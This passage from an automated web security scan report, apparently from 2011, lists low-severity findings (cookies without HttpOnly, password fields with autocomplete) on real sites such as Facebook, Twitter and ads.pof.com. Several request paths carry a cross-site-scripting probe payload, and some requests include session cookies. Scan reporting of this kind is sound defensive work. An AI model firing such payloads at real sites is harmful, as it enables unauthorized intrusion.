Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 16:18:14 GMT
Server: Apache/2.2.9 (Unix) mod_jk/1.2.15
Location: http://www.trip.com/flights.html?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Content-Length: 358
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e34a3745525d5f4f58455e445a4a423660;path=/
Set-Cookie: NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3882b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.trip.com/fli
...[SNIP]...

12.764. http://www.untraceableemail.net/boobitrap/eCheck.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.untraceableemail.net
Path:	/boobitrap/eCheck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Apache=173.193.214.243.1296663320848847; path=/; expires=Wed, 09-Mar-11 16:15:20 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /boobitrap/eCheck.php HTTP/1.1
Host: www.untraceableemail.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.765. http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.virtualtourist.com
Path:	/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

VTT=64.14.197.3.1296663496.485621; Path=/; Domain=.virtualtourist.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.766. http://www.websitetoolbox.com/tool/view/mb/file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.websitetoolbox.com
Path:	/tool/view/mb/file

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

newvisit=1297002738; path=/; domain=.websitetoolbox.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;
lastvisit=1297002738; path=/; domain=.websitetoolbox.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.767. http://www.worldmastiffforum.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.worldmastiffforum.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

newvisit=1296706031; path=/; domain=.worldmastiffforum.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;
lastvisit=1296706031; path=/; domain=.worldmastiffforum.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.worldmastiffforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.768. http://www.worldmastiffforum.com/file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.worldmastiffforum.com
Path:	/file

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

newvisit=1297002739; path=/; domain=.worldmastiffforum.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;
lastvisit=1296706072; path=/; domain=.worldmastiffforum.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.769. http://www.youtube.com/user/sqlrtfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/user/sqlrtfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
VISITOR_INFO1_LIVE=4OZBfTCMbDE; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 04:07:11 GMT
GEO=b5d573ea86f2fe3582072f5171923c13cwsAAAAzVVOtwdbzTUop7w==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user/sqlrtfm HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.770. http://xcdn.xgraph.net/15530/db/xg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://xcdn.xgraph.net
Path:	/15530/db/xg.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2; Domain=.xgraph.net; Expires=Sat, 01-Feb-2014 15:14:45 GMT; Path=/
_push4xgat=1296659685256; Domain=.xgraph.net; Expires=Thu, 03-Feb-2011 15:14:45 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.771. http://zone.msn.com/en-us/home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://zone.msn.com
Path:	/en-us/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ZMisc=ClientCheck=Current; domain=zone.msn.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/home HTTP/1.1
Host: zone.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:18:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
SN: MSNG04
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ZMisc=ClientCheck=Current; domain=zone.msn.com; path=/
Set-Cookie: ASP.NET_SessionId=qnkjon55feogfiy1wq0oci55; path=/; HttpOnly
Cache-Control: private
Expires: Wed, 02 Feb 2011 16:18:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 51664
Connection: close
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-eq
...[SNIP]...

13. Password field with autocomplete enabled previous next
There are 160 instances of this issue:

https://ads.pof.com/
https://ads.pof.com/
https://ads.pof.com/Default.aspx
https://ads.pof.com/Default.aspx
https://ads.pof.com/Default.aspx/%22ns=%22alert(0x000176)
https://ads.pof.com/Default.aspx/%22ns=%22alert(0x000176)
https://ads.pof.com/Default.aspx/assets/png/create_your_first_ad.png
https://ads.pof.com/Default.aspx/assets/png/create_your_first_ad.png
http://blog.facebook.com/blog.php
http://boardreader.com/my.html
http://clickaider.com/
http://erncpa.com/
https://gc.synxis.com/rez.aspx
https://gc.synxis.com/xbe/rez.aspx
http://it.toolbox.com/blogs/database-soup
http://it.toolbox.com/blogs/database-talk
http://it.toolbox.com/blogs/db2luw
http://it.toolbox.com/blogs/db2zos
http://it.toolbox.com/blogs/elsua
http://it.toolbox.com/blogs/juice-analytics
http://it.toolbox.com/blogs/minimalit
http://it.toolbox.com/blogs/penguinista-databasiensis
http://it.toolbox.com/blogs/ppmtoday
https://login.facebook.com/
https://login.facebook.com/
https://login.facebook.com/ajax/intl/language_dialog.php
https://login.facebook.com/help/
https://login.facebook.com/login.php
https://login.facebook.com/r.php
https://login.facebook.com/r.php
https://login.facebook.com/r.php
https://publish.omniture.com/center/
https://sitesearch.omniture.com/center/
http://twitter.com/
http://twitter.com/BWBLLC
http://twitter.com/BW_Technology
http://twitter.com/Chester_Pitts
http://twitter.com/Cirque
http://twitter.com/JetBlue
http://twitter.com/JohnsHopkinsSPH
http://twitter.com/McKQuarterly
http://twitter.com/MomsWhoSave
http://twitter.com/NetworkConnects
http://twitter.com/Nightline
http://twitter.com/NoReservations
http://twitter.com/NylonMag
http://twitter.com/OmnitureEMEA
http://twitter.com/PeaceCorps
http://twitter.com/Support
http://twitter.com/TakeoSpikes51
http://twitter.com/TomorrowCounsel
http://twitter.com/VirginiaBeachWk
http://twitter.com/Wyome655
http://twitter.com/arnui
http://twitter.com/ashleytisdale
http://twitter.com/best_golf
http://twitter.com/buyantsogtoo
http://twitter.com/chain_llc
http://twitter.com/chain_llc_cod
http://twitter.com/chain_llc_mg
http://twitter.com/cloudscan
http://twitter.com/coolmompicks
http://twitter.com/davidgregory
http://twitter.com/designmilk
http://twitter.com/donlomb
http://twitter.com/gamespot
http://twitter.com/jasmith579
http://twitter.com/jobs4writers
http://twitter.com/ligatt
http://twitter.com/lijobs_sales
http://twitter.com/login
http://twitter.com/millenniumpr
http://twitter.com/omniture
http://twitter.com/omniturecare
http://twitter.com/orbitz
http://twitter.com/prolawrssfeed
http://twitter.com/qianam
http://twitter.com/rosyresources
http://twitter.com/sarahdessen
http://twitter.com/science
http://twitter.com/search
http://twitter.com/sethmeyers21
http://twitter.com/sp_arizona
http://twitter.com/sp_oregon
http://twitter.com/sp_tx
http://twitter.com/toptweets/favorites
https://twitter.com/
https://twitter.com/login
https://twitter.com/sessions
http://wp-superslider.com/
https://www.astaro.co.uk/beacon/(beid
https://www.astaro.com/beacon/(beid
https://www.astaro.com/en/user/login
https://www.astaro.com/tool/signup
https://www.astaro.com/user/login
https://www.astaro.de/beacon/(beid
https://www.astaro.net/beacon/(beid
http://www.astaro.org/
http://www.delish.com/entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips
http://www.demandstudios.com/ehow-writers.html
http://www.ehow.com/account/simple_login.aspx
http://www.ehow.com/account/simple_register.aspx
http://www.ehow.com/account/simple_register.aspx
https://www.ehow.com/account/simple_login.aspx
https://www.ehow.com/account/simple_register.aspx
https://www.ehow.com/forms/signin.aspx
http://www.evow.com/
http://www.evow.com/
http://www.facebook.com/
http://www.facebook.com/
http://www.facebook.com/%s
http://www.facebook.com/2008/fbml
http://www.facebook.com/MillenniumHotels
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/btaylor
http://www.facebook.com/careers/
http://www.facebook.com/directory/pages/
http://www.facebook.com/directory/people/
http://www.facebook.com/facebook
http://www.facebook.com/help/
http://www.facebook.com/ligatt
http://www.facebook.com/platform
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/policy.php
http://www.facebook.com/privacy/explanation.php
http://www.facebook.com/r.php
http://www.facebook.com/r.php
http://www.facebook.com/r.php
http://www.facebook.com/r.php
http://www.facebook.com/terms.php
https://www.facebook.com/
https://www.facebook.com/
https://www.facebook.com/2008/fbml
https://www.facebook.com/login.php
https://www.google.com/accounts/Login
http://www.hotelclub.com/
https://www.orbitz.com/Secure/SignIn
https://www.orbitz.com/account/login
https://www.orbitz.com/account/registration
https://www.orbitz.com/trips/writeReview
http://www.plentyoffish.com/
http://www.plentyoffish.com/inbox.aspx
http://www.plentyoffish.com/meetme.aspx
http://www.plentyoffish.com/needs_test.aspx
http://www.plentyoffish.com/poftest.aspx
http://www.plentyoffish.com/poftest.aspx
http://www.plentyoffish.com/seriousintro.aspx
http://www.ratedesi.com/
http://www.ratedesi.com/
http://www.ratestogo.com/
http://www.reddit.com/domain/static.2mdn.net/new/x22
http://www.reddit.com/domain/static.2mdn.net/new/x22
http://www.reddit.com/domain/static.2mdn.net/x22
http://www.reddit.com/domain/static.2mdn.net/x22
http://www.shape.com/workouts/articles/blood_sugar.html
http://www.shape.com/workouts/articles/workout_schedule.html
http://www.threatexpert.com/signin.aspx
http://www.threatexpert.com/signup.aspx
http://www.untraceableemail.net/boobitrap/eCheck.php
http://www.worldmastiffforum.com/

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

13.1. https://ads.pof.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://ads.pof.com/Default.aspx

The form contains the following password field with autocomplete enabled:

password

Request

Response

13.2. https://ads.pof.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://ads.pof.com/Default.aspx

The form contains the following password fields with autocomplete enabled:

user_password
user_password_confirm

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=pf1zsia2vewc4vhyyu3ymws5; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 14:20:10 GMT
Content-Length: 25885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Local o
...[SNIP]...
</div>

<form action="/Default.aspx" method="post" name="frmRegister" onsubmit="regValid.validateForm();return regValid.checkValid();" >
<input type="hidden" name="mode" value="0" />
...[SNIP]...
<td>
<input class="inputs" name="user_password" type="password" onblur="regValid.vEmpty(this);regValid.vTrimPassword(this);regValid.vPasswordLength(this,6);regValid.vPassword(this,0x00000005);" /><br />
...[SNIP]...
<td><input class="inputs" name="user_password_confirm" type="password" onblur="regValid.vEmpty(this);regValid.vValMatch(this,$('user_password'),'Passwords');" /></td>
...[SNIP]...

13.3. https://ads.pof.com/Default.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/Default.aspx

Issue detail

The page contains a form with the following action URL:

https://ads.pof.com/Default.aspx

The form contains the following password fields with autocomplete enabled:

user_password
user_password_confirm

Request

GET /Default.aspx HTTP/1.1
Host: ads.pof.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=pf1zsia2vewc4vhyyu3ymws5;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 14:33:00 GMT
Connection: close
Content-Length: 25885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Local o
...[SNIP]...
</div>

<form action="/Default.aspx" method="post" name="frmRegister" onsubmit="regValid.validateForm();return regValid.checkValid();" >
<input type="hidden" name="mode" value="0" />
...[SNIP]...
<td>
<input class="inputs" name="user_password" type="password" onblur="regValid.vEmpty(this);regValid.vTrimPassword(this);regValid.vPasswordLength(this,6);regValid.vPassword(this,0x00000005);" /><br />
...[SNIP]...
<td><input class="inputs" name="user_password_confirm" type="password" onblur="regValid.vEmpty(this);regValid.vValMatch(this,$('user_password'),'Passwords');" /></td>
...[SNIP]...

13.4. https://ads.pof.com/Default.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/Default.aspx

Issue detail

The page contains a form with the following action URL:

https://ads.pof.com/Default.aspx

The form contains the following password field with autocomplete enabled:

password

Request

Response

13.5. https://ads.pof.com/Default.aspx/%22ns=%22alert(0x000176) previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/Default.aspx/%22ns=%22alert(0x000176)

Issue detail

The page contains a form with the following action URL:

https://ads.pof.com/Default.aspx

The form contains the following password field with autocomplete enabled:

password

Request

GET /Default.aspx/%22ns=%22alert(0x000176) HTTP/1.1
Host: ads.pof.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pf1zsia2vewc4vhyyu3ymws5

Response

13.6. https://ads.pof.com/Default.aspx/%22ns=%22alert(0x000176) previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/Default.aspx/%22ns=%22alert(0x000176)

Issue detail

The page contains a form with the following action URL:

https://ads.pof.com/Default.aspx

The form contains the following password fields with autocomplete enabled:

user_password
user_password_confirm

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 14:34:13 GMT
Content-Length: 25885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Local o
...[SNIP]...
</div>

<form action="/Default.aspx" method="post" name="frmRegister" onsubmit="regValid.validateForm();return regValid.checkValid();" >
<input type="hidden" name="mode" value="0" />
...[SNIP]...
<td>
<input class="inputs" name="user_password" type="password" onblur="regValid.vEmpty(this);regValid.vTrimPassword(this);regValid.vPasswordLength(this,6);regValid.vPassword(this,0x00000005);" /><br />
...[SNIP]...
<td><input class="inputs" name="user_password_confirm" type="password" onblur="regValid.vEmpty(this);regValid.vValMatch(this,$('user_password'),'Passwords');" /></td>
...[SNIP]...

13.7. https://ads.pof.com/Default.aspx/assets/png/create_your_first_ad.png previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/Default.aspx/assets/png/create_your_first_ad.png

Issue detail

The page contains a form with the following action URL:

https://ads.pof.com/Default.aspx

The form contains the following password field with autocomplete enabled:

password

Request

GET /Default.aspx/assets/png/create_your_first_ad.png HTTP/1.1
Host: ads.pof.com
Connection: keep-alive
Referer: https://ads.pof.com/Default.aspx/%22ns=%22alert(0x000176)
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pf1zsia2vewc4vhyyu3ymws5

Response

13.8. https://ads.pof.com/Default.aspx/assets/png/create_your_first_ad.png previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/Default.aspx/assets/png/create_your_first_ad.png

Issue detail

The page contains a form with the following action URL:

https://ads.pof.com/Default.aspx

The form contains the following password fields with autocomplete enabled:

user_password
user_password_confirm

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 14:34:20 GMT
Content-Length: 25885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Local o
...[SNIP]...
</div>

<form action="/Default.aspx" method="post" name="frmRegister" onsubmit="regValid.validateForm();return regValid.checkValid();" >
<input type="hidden" name="mode" value="0" />
...[SNIP]...
<td>
<input class="inputs" name="user_password" type="password" onblur="regValid.vEmpty(this);regValid.vTrimPassword(this);regValid.vPasswordLength(this,6);regValid.vPassword(this,0x00000005);" /><br />
...[SNIP]...
<td><input class="inputs" name="user_password_confirm" type="password" onblur="regValid.vEmpty(this);regValid.vValMatch(this,$('user_password'),'Passwords');" /></td>
...[SNIP]...

13.9. http://blog.facebook.com/blog.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://blog.facebook.com
Path:	/blog.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /blog.php?post=382978412130 HTTP/1.1
Host: blog.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.10. http://boardreader.com/my.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://boardreader.com
Path:	/my.html

Issue detail

The page contains a form with the following action URL:

http://boardreader.com/my/subscription.html

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.11. http://clickaider.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://clickaider.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://clickaider.com/user/login.html

The form contains the following password field with autocomplete enabled:

pass

Request

GET / HTTP/1.1
Host: clickaider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.12. http://erncpa.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://erncpa.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://portal.secure256.com/Public/SignIn.aspx?intDomainID=4525

The form contains the following password field with autocomplete enabled:

Password

Request

GET / HTTP/1.1
Host: erncpa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:08 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 34476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="IE=EmulateIE
...[SNIP]...
</script>

<form
   name="form"
STYLE="margin: 0px; padding: 0px;"
method="post"
action="https://portal.secure256.com/Public/SignIn.aspx?intDomainID=4525">

<table border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td>
<input
   style="border:1px solid #d0d0d0;
background-color:#FFFFFF;
height:15px;
color:#000000;
font-size:10px;
margin: 0px;
padding: 0px;"
id="style_Password"
name="Password"
class="box"
type="password"
value="Password"
   onclick="clickclear(this, 'Password')" onblur="clickrecall(this,'Password')">

</td>
...[SNIP]...

13.13. https://gc.synxis.com/rez.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/rez.aspx

Issue detail

The page contains a form with the following action URL:

https://gc.synxis.com/rez.aspx?&&Chain=5303&start=16

The form contains the following password field with autocomplete enabled:

V16$C1$PasswordTextbox

Request

GET /rez.aspx?&Chain=5303&start=16& HTTP/1.1
Host: gc.synxis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574114|session#1296573995979-796819#1296575914;

Response

13.14. https://gc.synxis.com/xbe/rez.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/xbe/rez.aspx

Issue detail

The page contains a form with the following action URL:

https://gc.synxis.com/xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2f01%2f2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819

The form contains the following password field with autocomplete enabled:

V1$C7$cl$LoginPasswordTextBox

Request

GET /xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2F01%2F2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819 HTTP/1.1
Host: gc.synxis.com
Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

13.15. http://it.toolbox.com/blogs/database-soup previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/database-soup

Issue detail

The page contains a form with the following action URL:

http://it.toolbox.com/blogs/database-soup

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/database-soup HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.16. http://it.toolbox.com/blogs/database-talk previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/database-talk

Issue detail

The page contains a form with the following action URL:

http://it.toolbox.com/blogs/database-talk

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/database-talk HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.17. http://it.toolbox.com/blogs/db2luw previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/db2luw

Issue detail

The page contains a form with the following action URL:

http://it.toolbox.com/blogs/db2luw

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/db2luw HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.18. http://it.toolbox.com/blogs/db2zos previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/db2zos

Issue detail

The page contains a form with the following action URL:

http://it.toolbox.com/blogs/db2zos

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/db2zos HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.19. http://it.toolbox.com/blogs/elsua previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/elsua

Issue detail

The page contains a form with the following action URL:

http://it.toolbox.com/blogs/elsua

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/elsua HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.20. http://it.toolbox.com/blogs/juice-analytics previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/juice-analytics

Issue detail

The page contains a form with the following action URL:

http://it.toolbox.com/blogs/juice-analytics

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/juice-analytics HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.21. http://it.toolbox.com/blogs/minimalit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/minimalit

Issue detail

The page contains a form with the following action URL:

http://it.toolbox.com/blogs/minimalit

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/minimalit HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.22. http://it.toolbox.com/blogs/penguinista-databasiensis previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/penguinista-databasiensis

Issue detail

The page contains a form with the following action URL:

